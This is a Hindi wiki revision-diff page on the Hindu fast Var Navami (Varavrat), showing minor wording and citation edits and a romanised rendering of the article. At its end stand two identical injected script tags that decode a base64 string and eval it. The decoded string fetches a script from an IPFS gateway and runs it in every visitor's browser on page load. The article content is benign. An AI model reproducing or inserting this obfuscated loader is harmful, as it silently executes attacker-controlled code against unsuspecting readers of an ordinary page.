Difference between revisions of "वर नवमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==संबंधित लिंक==" to "==सम्बंधित लिंक==")
m (Text replace - ")</ref" to "</ref")
 
(6 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*प्रत्येक [[नवमी]] पर नौ वर्षों तक केवल आटा पर निर्वाह किया जाता है।
 
*प्रत्येक [[नवमी]] पर नौ वर्षों तक केवल आटा पर निर्वाह किया जाता है।
 
*वरनवमी तिथिव्रत है, देवी की पूजा की जाती है।
 
*वरनवमी तिथिव्रत है, देवी की पूजा की जाती है।
 
*वरनवमी सभी कामनाओं की पूर्ति के लिए किया जाता है।
 
*वरनवमी सभी कामनाओं की पूर्ति के लिए किया जाता है।
 
*यदि कर्ता जीवन भर बिना [[अग्नि देव|अग्नि]] पर पकाये नवमी पर भोजन करे तो उसे इहलोक एवं [[परलोक]] में अनन्त फल प्राप्त होते हैं।  
 
*यदि कर्ता जीवन भर बिना [[अग्नि देव|अग्नि]] पर पकाये नवमी पर भोजन करे तो उसे इहलोक एवं [[परलोक]] में अनन्त फल प्राप्त होते हैं।  
*कृत्यकल्पतरु <ref>(कृत्यकल्पतरु व्रत खण्ड 296)</ref>, हेमाद्रि <ref>(हेमाद्रि व्रत खण्ड 1, 937, [[भविष्यपुराण]] से उद्धरण)</ref> ने इसे 'वरव्रत' नाम दिया है।
+
*कृत्यकल्पतरु<ref>कृत्यकल्पतरु व्रत खण्ड 296</ref>, हेमाद्रि<ref>हेमाद्रि व्रत खण्ड 1, 937, [[भविष्य पुराण]] से उद्धरण</ref> ने इसे 'वरव्रत' नाम दिया है।
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==सम्बंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:46, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • pratyek navami par nau varshoan tak keval ata par nirvah kiya jata hai.
  • varanavami tithivrat hai, devi ki pooja ki jati hai.
  • varanavami sabhi kamanaoan ki poorti ke lie kiya jata hai.
  • yadi karta jivan bhar bina agni par pakaye navami par bhojan kare to use ihalok evan paralok mean anant phal prapt hote haian.
  • krityakalpataru[1], hemadri[2] ne ise 'varavrat' nam diya hai.

tika tippani aur sandarbh

  1. krityakalpataru vrat khand 296
  2. hemadri vrat khand 1, 937, bhavishy puran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>